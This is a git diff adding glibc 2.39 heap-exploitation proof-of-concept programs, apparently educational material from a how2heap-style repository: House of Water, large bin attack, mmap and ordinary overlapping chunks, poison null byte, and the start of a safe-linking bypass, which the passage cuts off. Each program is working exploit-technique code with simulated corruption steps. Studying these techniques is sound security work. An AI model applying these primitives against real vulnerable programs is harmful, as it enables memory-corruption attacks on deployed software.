puts(""); + + // This is just to make a pointer to the t-cache metadata for later. 
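  /*
   * A rough sketch of why the two frees above forge a "0x10001" header
   * (layout assumed from glibc's tcache_perthread_struct, which stores one
   * 16-bit count per bin followed by the per-bin entry pointers):
   *
   *   counts[idx(0x3e0)] = 1 and counts[idx(0x3f0)] = 1 are adjacent, so the
   *   bytes 01 00 01 00 00 00 00 00 read as the 64-bit value 0x10001 when
   *   interpreted as a chunk size field (a huge chunk with PREV_INUSE set).
   */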
+ void *metadata = (void *)((long)(fake_size_lsb) & ~(0xfff)); + + puts("The t-cache metadata will now have the following entry counts:"); + dump_memory(metadata+0x70, 3); + puts(""); + + // Make allocations to free later such that we can exhaust the 0x90 t-cache + puts("Allocate 7 0x88 chunks needed to fill out the 0x90 t-cache at a later time"); + void *x[7]; + for (int i = 0; i < 7; i++) { + x[i] = malloc(0x88); + } + puts(""); + + + puts("\n"); + puts("\t=============================="); + puts("\t| STEP 2 |"); + puts("\t=============================="); + puts("\n"); + + // Step 2: Create the unsorted bins linked list, used for hijacking at a later time + puts("Now, allocate three 0x90 chunks with guard chunks in between. This prevents"); + puts("chunk-consolidation and sets our target for the house of water attack."); + puts("\t- chunks:"); + + void *unsorted_start = malloc(0x88); + printf("\t\t* unsorted_start\t@ %p\n", unsorted_start); + _ = malloc(0x18); // Guard chunk + + puts("\t\t* /guard/"); + + void *unsorted_middle = malloc(0x88); + printf("\t\t* unsorted_middle\t@ %p\n", unsorted_middle); + _ = malloc(0x18); // Guard chunk + + puts("\t\t* /guard/"); + + void *unsorted_end = malloc(0x88); + printf("\t\t* unsorted_end\t\t@ %p\n", unsorted_end); + _ = malloc(0x18); // Guard chunk + + puts("\t\t* /guard/"); + + puts(""); + + + puts("\n"); + puts("\t=============================="); + puts("\t| STEP 3 |"); + puts("\t=============================="); + puts("\n"); + + // Step 3: Satisfy the conditions for a free'd chunk, namely having the correct size at the end of the chunk and + // a size field next to it having it's prev-in-use bit set to 0 + puts("Make an allocation to reach the end of the faked chunk"); + + _ = malloc(0xf000); // Padding + void *end_of_fake = malloc(0x18); // Metadata chunk + + puts("\t- chunks:"); + printf("\t\t* padding\t\t@ %p\n", _); + printf("\t\t* end of fake\t\t@ %p\n", end_of_fake); + puts(""); + + puts("Write the correct metadata to the chunk to prevent libc from failing checks:"); + printf("\t*%p = 0x10000\n", end_of_fake); + *(long *)end_of_fake = 0x10000; + printf("\t*%p = 0x20\n", end_of_fake+8); + *(long *)(end_of_fake+0x8) = 0x20; + puts(""); + + puts("Creating the following setup:"); + puts(""); + dump_memory(end_of_fake, 1); + puts(""); + + + puts("\n"); + puts("\t=============================="); + puts("\t| STEP 4 |"); + puts("\t=============================="); + puts("\n"); + + // Step 4: Free t-cache entries + puts("Fill up the 0x90 t-cache with the chunks allocated from earlier by freeing them."); + puts("By doing so, the next time a 0x88 chunk is free'd, it ends up in the unsorted-bin"); + puts("instead of the t-cache or small-bins."); + for (int i = 0; i < 7; i++) { + free(x[i]); + } + puts("\n"); + + + puts("\n"); + puts("\t=============================="); + puts("\t| STEP 5 |"); + puts("\t=============================="); + puts("\n"); + + // Step 5: Create a 0x20 and a 0x30 t-cache entry which overlaps unsorted_start and unsorted_end. + // By doing this, we can blindly fake a FWD and BCK pointer in the t-cache metadata! 
+ + puts("Here comes the trickiest part!\n"); + + puts("We essentially want a pointer in the 0x20 t-cache metadata to act as a FWD\n" + "pointer and a pointer in the 0x30 t-cache to act as a BCK pointer."); + puts("We want it such that it points to the chunk header of our unsorted bin entries,\n" + "and not at the chunk itself which is common for t-cache.\n"); + + puts("Using a technique like house of botcake or a stronger arb-free primitive, free a"); + puts("chunk such that it overlaps with the header of unsorted_start and unsorte_end."); + puts(""); + + puts("It should look like the following:"); + puts(""); + + puts("unsorted_start:"); + printf("0x%016lx\t\t0x%016lx 0x%016lx <-- tcachebins[0x30][0/1], unsortedbin[all][0]\n", (unsigned long)(unsorted_start-0x10), *(long *)(unsorted_start-0x10), *(long *)(unsorted_start-0x8)); + dump_memory(unsorted_start, 2); + puts(""); + + puts("unsorted_end:"); + printf("0x%016lx\t\t0x%016lx 0x%016lx <-- tcachebins[0x20][0/1], unsortedbin[all][2]\n", (unsigned long)(unsorted_end-0x10), *(long *)(unsorted_end-0x10), *(long *)(unsorted_end-0x8)); + dump_memory(unsorted_end, 2); + + puts("\n"); + puts("If you want to see a blind example using only double free, see the following chal: "); + puts("https://github.com/UDPctf/CTF-challenges/tree/main/Potluck-CTF-2023/Tamagoyaki"); + puts("\n"); + + puts("For the sake of simplicity, let's just simulate an arbitrary free primitive."); + puts("\n"); + + + puts("--------------------"); + puts("| PART 1 |"); + puts("--------------------"); + puts("\n"); + + // Step 5 part 1: + puts("Write 0x31 above unsorted_start to enable its freeing into the 0x30 t-cache."); + printf("\t*%p-0x18 = 0x31\n", unsorted_start); + *(long*)(unsorted_start-0x18) = 0x31; + puts(""); + + puts("This creates a 0x31 entry just above unsorted_start, which looks like the following:"); + dump_memory(unsorted_start-0x20, 3); + puts(""); + + printf("Free the faked 0x31 chunk @ %p\n", unsorted_start-0x10); + free(unsorted_start-0x10); // Create a fake FWD + puts(""); + + puts("Finally, because of the meta-data created by free'ing the 0x31 chunk, we need to"); + puts("restore the original header of the unsorted_start chunk by restoring the 0x91 header:"); + printf("\t*%p-0x8 = 0x91\n", unsorted_start); + *(long*)(unsorted_start-0x8) = 0x91; + puts(""); + + puts("Now, let's do the same for unsorted_end except using a 0x21 faked chunk."); + puts(""); + + + puts("--------------------"); + puts("| PART 2 |"); + puts("--------------------"); + puts("\n"); + + // Step 5 part 2: + puts("Write 0x21 above unsorted_end, such that it can be free'd in to the 0x20 t-cache:"); + printf("\t*%p-0x18 = 0x21\n", unsorted_end); + *(long*)(unsorted_end-0x18) = 0x21; + puts(""); + + puts("This creates a 0x21 just above unsorted_end, which looks like the following:"); + dump_memory(unsorted_end-0x20, 3); + puts(""); + + printf("Free the faked 0x21 chunk @ %p\n", unsorted_end-0x10); + free(unsorted_end-0x10); // Create a fake BCK + puts(""); + + puts("restore the original header of the unsorted_end chunk by restoring the 0x91 header:"); + printf("\t*%p-0x8 = 0x91\n", unsorted_end); + *(long*)(unsorted_end-0x8) = 0x91; + puts(""); + + + puts("\n"); + puts("\t=============================="); + puts("\t| STEP 6 |"); + puts("\t=============================="); + puts("\n"); + + // Step 6: Create the unsorted bin list + puts("Now, let's free the unsorted bin entries!"); + + puts("\t> free(unsorted_end);"); + free(unsorted_end); + + puts("\t> free(unsorted_middle);"); + 
free(unsorted_middle); + + puts("\t> free(unsorted_start);"); + free(unsorted_start); + + puts("\n"); + + // Show the setup as is + + puts("At this point, our heap looks something like this:"); + + printf("\t- Unsorted bin:\n"); + puts("\t\tunsorted_start <--> unsorted_middle <--> unsorted_end"); + printf("\t\t%p <--> %p <--> %p\n", unsorted_start-0x10, unsorted_middle-0x10, unsorted_end-0x10); + + printf("\t- 0x20 t-cache:\n"); + printf("\t\t* 0x%lx\n", *(long*)(metadata+0x90)); + printf("\t- 0x30 t-cache\n"); + printf("\t\t* 0x%lx\n", *(long*)(metadata+0x98)); + puts(""); + + puts("The fake chunk in the t-cache will look like the following:"); + dump_memory(metadata+0x70, 4); + puts(""); + + puts("We can now observe that the 0x30 t-cache points to unsorted_start and 0x20 t-cache points to "); + puts("unsorted_end, which is what we need to fake an unsorted-bin entry and hijack unsorted_middle."); + + + puts("\n"); + puts("\t=============================="); + puts("\t| STEP 7 |"); + puts("\t=============================="); + puts("\n"); + + // Step 7: Overwrite LSB of unsorted_start and unsorted_end to point to the fake t-cache metadata chunk + puts("Finally, all there is left to do is simply overwrite the LSB of unsorted_start FWD-"); + puts("and BCK pointer for unsorted_end to point to the faked t-cache metadata chunk."); + puts(""); + + /* VULNERABILITY */ + printf("\t- unsorted_start:\n"); + printf("\t\t*%p = %p\n", unsorted_start, metadata+0x80); + *(unsigned long *)unsorted_start = (unsigned long)(metadata+0x80); + puts(""); + + printf("\t- unsorted_end:\n"); + printf("\t\t*%p = %p\n", unsorted_end, metadata+0x80); + *(unsigned long *)(unsorted_end+0x8) = (unsigned long)(metadata+0x80); + puts(""); + /* VULNERABILITY */ + + puts("At this point, the unsorted bin will look like the following:"); + puts(""); + + puts("\t- unsorted bin:"); + printf("\t\t unsorted_start <--> metadata chunk <--> unsorted_end\n"); + printf("\t\t %p\t %p %p\n", unsorted_start, metadata+0x80, unsorted_end); + + + puts("\n"); + puts("\t=============================="); + puts("\t| STEP 8 |"); + puts("\t=============================="); + puts("\n"); + + // Step 8: allocate to win + puts("Now, simply just allocate a chunk that's within the 0x10000 range"); + puts("to allocate from the faked chunk. As an example, we will allocate a 0x288:"); + + puts("\t- 0x288 chunk:"); + + // Next allocation *could* be our faked chunk! + void *meta_chunk = malloc(0x288); + + printf("\t\tNew chunk\t @ %p\n", meta_chunk); + printf("\t\tt-cache metadata @ %p\n", metadata); + assert(meta_chunk == (metadata+0x90)); + puts(""); + + + puts("\n"); + puts("\t=============================="); + puts("\t| BONUS! |"); + puts("\t=============================="); + puts("\n"); + + // BONUS! 
+ puts("Whilst the primary goal of this house is to provide a leakless way"); + puts("to gain t-cache control by overwriting LSB, a nice bonus is the free LIBC"); + puts("pointer we get as an added bonus to the method!"); + puts(""); + + puts("This is what the t-cache metadata will look like after we allocated the"); + puts("t-cache metadata chunk:"); + dump_memory(metadata+0x70, 4); + puts(""); + + + puts("Notice how the 0x20 and 0x30 t-cache now contains a libc pointer to the main_arena."); +} diff --git a/glibc_2.39/large_bin_attack.c b/glibc_2.39/large_bin_attack.c new file mode 100644 index 0000000..0a1d8c9 --- /dev/null +++ b/glibc_2.39/large_bin_attack.c @@ -0,0 +1,94 @@ +#include +#include +#include + +/* + +A revisit to large bin attack for after glibc2.30 + +Relevant code snippet : + + if ((unsigned long) (size) < (unsigned long) chunksize_nomask (bck->bk)){ + fwd = bck; + bck = bck->bk; + victim->fd_nextsize = fwd->fd; + victim->bk_nextsize = fwd->fd->bk_nextsize; + fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim; + } + + +*/ + +int main(){ + /*Disable IO buffering to prevent stream from interfering with heap*/ + setvbuf(stdin,NULL,_IONBF,0); + setvbuf(stdout,NULL,_IONBF,0); + setvbuf(stderr,NULL,_IONBF,0); + + printf("\n\n"); + printf("Since glibc2.30, two new checks have been enforced on large bin chunk insertion\n\n"); + printf("Check 1 : \n"); + printf("> if (__glibc_unlikely (fwd->bk_nextsize->fd_nextsize != fwd))\n"); + printf("> malloc_printerr (\"malloc(): largebin double linked list corrupted (nextsize)\");\n"); + printf("Check 2 : \n"); + printf("> if (bck->fd != fwd)\n"); + printf("> malloc_printerr (\"malloc(): largebin double linked list corrupted (bk)\");\n\n"); + printf("This prevents the traditional large bin attack\n"); + printf("However, there is still one possible path to trigger large bin attack. 
The PoC is shown below : \n\n"); + + printf("====================================================================\n\n"); + + size_t target = 0; + printf("Here is the target we want to overwrite (%p) : %lu\n\n",&target,target); + size_t *p1 = malloc(0x428); + printf("First, we allocate a large chunk [p1] (%p)\n",p1-2); + size_t *g1 = malloc(0x18); + printf("And another chunk to prevent consolidate\n"); + + printf("\n"); + + size_t *p2 = malloc(0x418); + printf("We also allocate a second large chunk [p2] (%p).\n",p2-2); + printf("This chunk should be smaller than [p1] and belong to the same large bin.\n"); + size_t *g2 = malloc(0x18); + printf("Once again, allocate a guard chunk to prevent consolidate\n"); + + printf("\n"); + + free(p1); + printf("Free the larger of the two --> [p1] (%p)\n",p1-2); + size_t *g3 = malloc(0x438); + printf("Allocate a chunk larger than [p1] to insert [p1] into large bin\n"); + + printf("\n"); + + free(p2); + printf("Free the smaller of the two --> [p2] (%p)\n",p2-2); + printf("At this point, we have one chunk in large bin [p1] (%p),\n",p1-2); + printf(" and one chunk in unsorted bin [p2] (%p)\n",p2-2); + + printf("\n"); + + p1[3] = (size_t)((&target)-4); + printf("Now modify the p1->bk_nextsize to [target-0x20] (%p)\n",(&target)-4); + + printf("\n"); + + size_t *g4 = malloc(0x438); + printf("Finally, allocate another chunk larger than [p2] (%p) to place [p2] (%p) into large bin\n", p2-2, p2-2); + printf("Since glibc does not check chunk->bk_nextsize if the new inserted chunk is smaller than smallest,\n"); + printf(" the modified p1->bk_nextsize does not trigger any error\n"); + printf("Upon inserting [p2] (%p) into largebin, [p1](%p)->bk_nextsize->fd_nextsize is overwritten to address of [p2] (%p)\n", p2-2, p1-2, p2-2); + + printf("\n"); + + printf("In our case here, target is now overwritten to address of [p2] (%p), [target] (%p)\n", p2-2, (void *)target); + printf("Target (%p) : %p\n",&target,(size_t*)target); + + printf("\n"); + printf("====================================================================\n\n"); + + assert((size_t)(p2-2) == target); + + return 0; +} diff --git a/glibc_2.39/mmap_overlapping_chunks.c b/glibc_2.39/mmap_overlapping_chunks.c new file mode 100644 index 0000000..052392b --- /dev/null +++ b/glibc_2.39/mmap_overlapping_chunks.c @@ -0,0 +1,140 @@ +#include +#include +#include + +/* +Technique should work on all versions of GLibC +Compile: `gcc mmap_overlapping_chunks.c -o mmap_overlapping_chunks -g` + +POC written by POC written by Maxwell Dulin (Strikeout) +*/ +int main(){ + /* + A primer on Mmap chunks in GLibC + ================================== + In GLibC, there is a point where an allocation is so large that malloc + decides that we need a seperate section of memory for it, instead + of allocating it on the normal heap. This is determined by the mmap_threshold var. + Instead of the normal logic for getting a chunk, the system call *Mmap* is + used. This allocates a section of virtual memory and gives it back to the user. + + Similarly, the freeing process is going to be different. Instead + of a free chunk being given back to a bin or to the rest of the heap, + another syscall is used: *Munmap*. This takes in a pointer of a previously + allocated Mmap chunk and releases it back to the kernel. + + Mmap chunks have special bit set on the size metadata: the second bit. If this + bit is set, then the chunk was allocated as an Mmap chunk. + + Mmap chunks have a prev_size and a size. 
The *size* represents the current + size of the chunk. The *prev_size* of a chunk represents the left over space + from the size of the Mmap chunk (not the chunks directly belows size). + However, the fd and bk pointers are not used, as Mmap chunks do not go back + into bins, as most heap chunks in GLibC Malloc do. Upon freeing, the size of + the chunk must be page-aligned. + + The POC below is essentially an overlapping chunk attack but on mmap chunks. + This is very similar to https://github.com/shellphish/how2heap/blob/master/glibc_2.26/overlapping_chunks.c. + The main difference is that mmapped chunks have special properties and are + handled in different ways, creating different attack scenarios than normal + overlapping chunk attacks. There are other things that can be done, + such as munmapping system libraries, the heap itself and other things. + This is meant to be a simple proof of concept to demonstrate the general + way to perform an attack on an mmap chunk. + + For more information on mmap chunks in GLibC, read this post: + http://tukan.farm/2016/07/27/munmap-madness/ + */ + + int* ptr1 = malloc(0x10); + + printf("This is performing an overlapping chunk attack but on extremely large chunks (mmap chunks).\n"); + printf("Extremely large chunks are special because they are allocated in their own mmaped section\n"); + printf("of memory, instead of being put onto the normal heap.\n"); + puts("=======================================================\n"); + printf("Allocating three extremely large heap chunks of size 0x100000 \n\n"); + + long long* top_ptr = malloc(0x100000); + printf("The first mmap chunk goes directly above LibC: %p\n",top_ptr); + + // After this, all chunks are allocated downwards in memory towards the heap. + long long* mmap_chunk_2 = malloc(0x100000); + printf("The second mmap chunk goes below LibC: %p\n", mmap_chunk_2); + + long long* mmap_chunk_3 = malloc(0x100000); + printf("The third mmap chunk goes below the second mmap chunk: %p\n", mmap_chunk_3); + + printf("\nCurrent System Memory Layout \n" \ +"================================================\n" \ +"running program\n" \ +"heap\n" \ +"....\n" \ +"third mmap chunk\n" \ +"second mmap chunk\n" \ +"LibC\n" \ +"....\n" \ +"ld\n" \ +"first mmap chunk\n" +"===============================================\n\n" \ +); + + printf("Prev Size of third mmap chunk: 0x%llx\n", mmap_chunk_3[-2]); + printf("Size of third mmap chunk: 0x%llx\n\n", mmap_chunk_3[-1]); + + printf("Change the size of the third mmap chunk to overlap with the second mmap chunk\n"); + printf("This will cause both chunks to be Munmapped and given back to the system\n"); + printf("This is where the vulnerability occurs; corrupting the size or prev_size of a chunk\n"); + + // Vulnerability!!! This could be triggered by an improper index or a buffer overflow from a chunk further below. + // Additionally, this same attack can be used with the prev_size instead of the size. + mmap_chunk_3[-1] = (0xFFFFFFFFFD & mmap_chunk_3[-1]) + (0xFFFFFFFFFD & mmap_chunk_2[-1]) | 2; + printf("New size of third mmap chunk: 0x%llx\n", mmap_chunk_3[-1]); + printf("Free the third mmap chunk, which munmaps the second and third chunks\n\n"); + + /* + This next call to free is actually just going to call munmap on the pointer we are passing it. + The source code for this can be found at https://elixir.bootlin.com/glibc/glibc-2.26/source/malloc/malloc.c#L2845 + + With normal frees the data is still writable and readable (which creates a use after free on + the chunk). 
However, when a chunk is munmapped, the memory is given back to the kernel. If this + data is read or written to, the program crashes. + + Because of this added restriction, the main goal is to get the memory back from the system + to have two pointers assigned to the same location. + */ + // Munmaps both the second and third pointers + free(mmap_chunk_3); + + /* + Would crash, if on the following: + mmap_chunk_2[0] = 0xdeadbeef; + This is because the memory would not be allocated to the current program. + */ + + /* + Allocate a very large chunk with malloc. This needs to be larger than + the previously freed chunk because the mmapthreshold has increased to 0x202000. + If the allocation is not larger than the size of the largest freed mmap + chunk then the allocation will happen in the normal section of heap memory. + */ + printf("Get a very large chunk from malloc to get mmapped chunk\n"); + printf("This should overlap over the previously munmapped/freed chunks\n"); + long long* overlapping_chunk = malloc(0x300000); + printf("Overlapped chunk Ptr: %p\n", overlapping_chunk); + printf("Overlapped chunk Ptr Size: 0x%llx\n", overlapping_chunk[-1]); + + // Gets the distance between the two pointers. + int distance = mmap_chunk_2 - overlapping_chunk; + printf("Distance between new chunk and the second mmap chunk (which was munmapped): 0x%x\n", distance); + printf("Value of index 0 of mmap chunk 2 prior to write: %llx\n", mmap_chunk_2[0]); + + // Set the value of the overlapped chunk. + printf("Setting the value of the overlapped chunk\n"); + overlapping_chunk[distance] = 0x1122334455667788; + + // Show that the pointer has been written to. + printf("Second chunk value (after write): 0x%llx\n", mmap_chunk_2[0]); + printf("Overlapped chunk value: 0x%llx\n\n", overlapping_chunk[distance]); + printf("Boom! The new chunk has been overlapped with a previous mmaped chunk\n"); + assert(mmap_chunk_2[0] == overlapping_chunk[distance]); +} diff --git a/glibc_2.39/overlapping_chunks.c b/glibc_2.39/overlapping_chunks.c new file mode 100644 index 0000000..5c12f7f --- /dev/null +++ b/glibc_2.39/overlapping_chunks.c @@ -0,0 +1,82 @@ +/* + + A simple tale of overlapping chunk. + This technique is taken from + http://www.contextis.com/documents/120/Glibc_Adventures-The_Forgotten_Chunks.pdf + +*/ + +#include +#include +#include +#include +#include + +int main(int argc , char* argv[]) +{ + setbuf(stdout, NULL); + + long *p1,*p2,*p3,*p4; + printf("\nThis is another simple chunks overlapping problem\n"); + printf("The previous technique is killed by patch: https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=b90ddd08f6dd688e651df9ee89ca3a69ff88cd0c\n" + "which ensures the next chunk of an unsortedbin must have prev_inuse bit unset\n" + "and the prev_size of it must match the unsortedbin's size\n" + "This new poc uses the same primitive as the previous one. 
Theoretically speaking, they are the same powerful.\n\n"); + + printf("Let's start to allocate 4 chunks on the heap\n"); + + p1 = malloc(0x80 - 8); + p2 = malloc(0x500 - 8); + p3 = malloc(0x80 - 8); + + printf("The 3 chunks have been allocated here:\np1=%p\np2=%p\np3=%p\n", p1, p2, p3); + + memset(p1, '1', 0x80 - 8); + memset(p2, '2', 0x500 - 8); + memset(p3, '3', 0x80 - 8); + + printf("Now let's simulate an overflow that can overwrite the size of the\nchunk freed p2.\n"); + int evil_chunk_size = 0x581; + int evil_region_size = 0x580 - 8; + printf("We are going to set the size of chunk p2 to to %d, which gives us\na region size of %d\n", + evil_chunk_size, evil_region_size); + + /* VULNERABILITY */ + *(p2-1) = evil_chunk_size; // we are overwriting the "size" field of chunk p2 + /* VULNERABILITY */ + + printf("\nNow let's free the chunk p2\n"); + free(p2); + printf("The chunk p2 is now in the unsorted bin ready to serve possible\nnew malloc() of its size\n"); + + printf("\nNow let's allocate another chunk with a size equal to the data\n" + "size of the chunk p2 injected size\n"); + printf("This malloc will be served from the previously freed chunk that\n" + "is parked in the unsorted bin which size has been modified by us\n"); + p4 = malloc(evil_region_size); + + printf("\np4 has been allocated at %p and ends at %p\n", (char *)p4, (char *)p4+evil_region_size); + printf("p3 starts at %p and ends at %p\n", (char *)p3, (char *)p3+0x580-8); + printf("p4 should overlap with p3, in this case p4 includes all p3.\n"); + + printf("\nNow everything copied inside chunk p4 can overwrites data on\nchunk p3," + " and data written to chunk p3 can overwrite data\nstored in the p4 chunk.\n\n"); + + printf("Let's run through an example. Right now, we have:\n"); + printf("p4 = %s\n", (char *)p4); + printf("p3 = %s\n", (char *)p3); + + printf("\nIf we memset(p4, '4', %d), we have:\n", evil_region_size); + memset(p4, '4', evil_region_size); + printf("p4 = %s\n", (char *)p4); + printf("p3 = %s\n", (char *)p3); + + printf("\nAnd if we then memset(p3, '3', 80), we have:\n"); + memset(p3, '3', 80); + printf("p4 = %s\n", (char *)p4); + printf("p3 = %s\n", (char *)p3); + + assert(strstr((char *)p4, (char *)p3)); +} + + diff --git a/glibc_2.39/poison_null_byte.c b/glibc_2.39/poison_null_byte.c new file mode 100644 index 0000000..5a34837 --- /dev/null +++ b/glibc_2.39/poison_null_byte.c @@ -0,0 +1,161 @@ +#include +#include +#include +#include + +int main() +{ + setbuf(stdin, NULL); + setbuf(stdout, NULL); + + puts("Welcome to poison null byte!"); + puts("Tested in Ubuntu 20.04 64bit."); + puts("This technique can be used when you have an off-by-one into a malloc'ed region with a null byte."); + + puts("Some of the implementation details are borrowed from https://github.com/StarCross-Tech/heap_exploit_2.31/blob/master/off_by_null.c\n"); + + // step1: allocate padding + puts("Step1: allocate a large padding so that the fake chunk's addresses's lowest 2nd byte is \\x00"); + void *tmp = malloc(0x1); + void *heap_base = (void *)((long)tmp & (~0xfff)); + printf("heap address: %p\n", heap_base); + size_t size = 0x10000 - ((long)tmp&0xffff) - 0x20; + printf("Calculate padding chunk size: 0x%lx\n", size); + puts("Allocate the padding. 
This is required to avoid a 4-bit bruteforce because we are going to overwrite least significant two bytes."); + void *padding= malloc(size); + + // step2: allocate prev chunk and victim chunk + puts("\nStep2: allocate two chunks adjacent to each other."); + puts("Let's call the first one 'prev' and the second one 'victim'."); + void *prev = malloc(0x500); + void *victim = malloc(0x4f0); + puts("malloc(0x10) to avoid consolidation"); + malloc(0x10); + printf("prev chunk: malloc(0x500) = %p\n", prev); + printf("victim chunk: malloc(0x4f0) = %p\n", victim); + + // step3: link prev into largebin + puts("\nStep3: Link prev into largebin"); + puts("This step is necessary for us to forge a fake chunk later"); + puts("The fd_nextsize of prev and bk_nextsize of prev will be the fd and bck pointers of the fake chunk"); + puts("allocate a chunk 'a' with size a little bit smaller than prev's"); + void *a = malloc(0x4f0); + printf("a: malloc(0x4f0) = %p\n", a); + puts("malloc(0x10) to avoid consolidation"); + malloc(0x10); + puts("allocate a chunk 'b' with size a little bit larger than prev's"); + void *b = malloc(0x510); + printf("b: malloc(0x510) = %p\n", b); + puts("malloc(0x10) to avoid consolidation"); + malloc(0x10); + + puts("\nCurrent Heap Layout\n" + " ... ...\n" + "padding\n" + " prev Chunk(addr=0x??0010, size=0x510)\n" + " victim Chunk(addr=0x??0520, size=0x500)\n" + " barrier Chunk(addr=0x??0a20, size=0x20)\n" + " a Chunk(addr=0x??0a40, size=0x500)\n" + " barrier Chunk(addr=0x??0f40, size=0x20)\n" + " b Chunk(addr=0x??0f60, size=0x520)\n" + " barrier Chunk(addr=0x??1480, size=0x20)\n"); + + puts("Now free a, b, prev"); + free(a); + free(b); + free(prev); + puts("current unsorted_bin: header <-> [prev, size=0x510] <-> [b, size=0x520] <-> [a, size=0x500]\n"); + + puts("Allocate a huge chunk to enable sorting"); + malloc(0x1000); + puts("current large_bin: header <-> [b, size=0x520] <-> [prev, size=0x510] <-> [a, size=0x500]\n"); + + puts("This will add a, b and prev to largebin\nNow prev is in largebin"); + printf("The fd_nextsize of prev points to a: %p\n", ((void **)prev)[2]+0x10); + printf("The bk_nextsize of prev points to b: %p\n", ((void **)prev)[3]+0x10); + + // step4: allocate prev again to construct fake chunk + puts("\nStep4: Allocate prev again to construct the fake chunk"); + puts("Since large chunk is sorted by size and a's size is smaller than prev's,"); + puts("we can allocate 0x500 as before to take prev out"); + void *prev2 = malloc(0x500); + printf("prev2: malloc(0x500) = %p\n", prev2); + puts("Now prev2 == prev, prev2->fd == prev2->fd_nextsize == a, and prev2->bk == prev2->bk_nextsize == b"); + assert(prev == prev2); + + puts("The fake chunk is contained in prev and the size is smaller than prev's size by 0x10"); + puts("So set its size to 0x501 (0x510-0x10 | flag)"); + ((long *)prev)[1] = 0x501; + puts("And set its prev_size(next_chunk) to 0x500 to bypass the size==prev_size(next_chunk) check"); + *(long *)(prev + 0x500) = 0x500; + printf("The fake chunk should be at: %p\n", prev + 0x10); + puts("use prev's fd_nextsize & bk_nextsize as fake_chunk's fd & bk"); + puts("Now we have fake_chunk->fd == a and fake_chunk->bk == b"); + + // step5: bypass unlinking + puts("\nStep5: Manipulate residual pointers to bypass unlinking later."); + puts("Take b out first by allocating 0x510"); + void *b2 = malloc(0x510); + printf("Because of the residual pointers in b, b->fd points to a right now: %p\n", ((void **)b2)[0]+0x10); + printf("We can overwrite the least significant two bytes to 
make it our fake chunk.\n" + "If the lowest 2nd byte is not \\x00, we need to guess what to write now\n"); + ((char*)b2)[0] = '\x10'; + ((char*)b2)[1] = '\x00'; // b->fd <- fake_chunk + printf("After the overwrite, b->fd is: %p, which is the chunk pointer to our fake chunk\n", ((void **)b2)[0]); + + puts("To do the same to a, we can move it to unsorted bin first" + "by taking it out from largebin and free it into unsortedbin"); + void *a2 = malloc(0x4f0); + free(a2); + puts("Now free victim into unsortedbin so that a->bck points to victim"); + free(victim); + printf("a->bck: %p, victim: %p\n", ((void **)a)[1], victim); + puts("Again, we take a out and overwrite a->bck to fake chunk"); + void *a3 = malloc(0x4f0); + ((char*)a3)[8] = '\x10'; + ((char*)a3)[9] = '\x00'; + printf("After the overwrite, a->bck is: %p, which is the chunk pointer to our fake chunk\n", ((void **)a3)[1]); + // pass unlink_chunk in malloc.c: + // mchunkptr fd = p->fd; + // mchunkptr bk = p->bk; + // if (__builtin_expect (fd->bk != p || bk->fd != p, 0)) + // malloc_printerr ("corrupted double-linked list"); + puts("And we have:\n" + "fake_chunk->fd->bk == a->bk == fake_chunk\n" + "fake_chunk->bk->fd == b->fd == fake_chunk\n" + ); + + // step6: add fake chunk into unsorted bin by off-by-null + puts("\nStep6: Use backward consolidation to add fake chunk into unsortedbin"); + puts("Take victim out from unsortedbin"); + void *victim2 = malloc(0x4f0); + printf("%p\n", victim2); + puts("off-by-null into the size of vicim"); + /* VULNERABILITY */ + ((char *)victim2)[-8] = '\x00'; + /* VULNERABILITY */ + + puts("Now if we free victim, libc will think the fake chunk is a free chunk above victim\n" + "It will try to backward consolidate victim with our fake chunk by unlinking the fake chunk then\n" + "add the merged chunk into unsortedbin." + ); + printf("For our fake chunk, because of what we did in step4,\n" + "now P->fd->bk(%p) == P(%p), P->bk->fd(%p) == P(%p)\n" + "so the unlink will succeed\n", ((void **)a3)[1], prev, ((void **)b2)[0], prev); + free(victim); + puts("After freeing the victim, the new merged chunk is added to unsorted bin" + "And it is overlapped with the prev chunk"); + + // step7: validate the chunk overlapping + puts("Now let's validate the chunk overlapping"); + void *merged = malloc(0x100); + printf("merged: malloc(0x100) = %p\n", merged); + memset(merged, 'A', 0x80); + printf("Now merged's content: %s\n", (char *)merged); + + puts("Overwrite prev's content"); + memset(prev2, 'C', 0x80); + printf("merged's content has changed to: %s\n", (char *)merged); + + assert(strstr(merged, "CCCCCCCCC")); +} diff --git a/glibc_2.39/safe_link_double_protect.c b/glibc_2.39/safe_link_double_protect.c new file mode 100644 index 0000000..3c11f1b --- /dev/null +++ b/glibc_2.39/safe_link_double_protect.c @@ -0,0 +1,128 @@ +#include +#include +#include +#include + +/* + * This method showcases a blind bypass for the safe-linking mitigation introduced in glibc 2.32. + * https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=a1a486d70ebcc47a686ff5846875eacad0940e41 + * + * NOTE: This requires 4 bits of bruteforce if the primitive is a write primitive, as the LSB will + * contain 4 bits of randomness. If you can increment integers, no brutefore is required. + * + * Safe-Linking is a memory protection measure using ASLR randomness to fortify single-linked lists. + * It obfuscates pointers and enforces alignment checks, to prevent pointer hijacking in t-cache. 
+int main(void) {
+    // Prevent _IO_FILE from buffering in the heap
+    setbuf(stdin, NULL);
+    setbuf(stdout, NULL);
+    setbuf(stderr, NULL);
+
+    // Create the goal stack buffer
+    char goal[] = "Replace me!";
+    puts("============================================================");
+    printf("Our goal is to write to the stack variable @ %p\n", goal);
+    printf("String contains: %s\n", goal);
+    puts("============================================================");
+    puts("\n");
+
+    // Step 1: Allocate
+    puts("Allocate two chunks in two different t-caches:");
+
+    // Allocate two chunks of size 0x38 for the 0x40 t-cache
+    puts("\t- 0x40 chunks:");
+    void *a = malloc(0x38);
+    void *b = malloc(0x38);
+    printf("\t\t* Entry a @ %p\n", a);
+    printf("\t\t* Entry b @ %p\n", b);
+
+    // Allocate two chunks of size 0x18 for the 0x20 t-cache
+    void *c = malloc(0x18);
+    void *d = malloc(0x18);
+    puts("\t- 0x20 chunks:");
+    printf("\t\t* Entry c @ %p\n", c);
+    printf("\t\t* Entry d @ %p\n", d);
+    puts("");
+
+    // Step 2: Write an arbitrary value (or note the offset to an existing value)
+    puts("Allocate a pointer which will contain a pointer to the stack variable:");
+
+    // Allocate a chunk and store a modified pointer to the 'goal' array.
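+    // (Assumption worth noting: from glibc 2.32 on, a tcache entry handed back by
+    // malloc() must be 16-byte aligned on x86_64, otherwise the process aborts with
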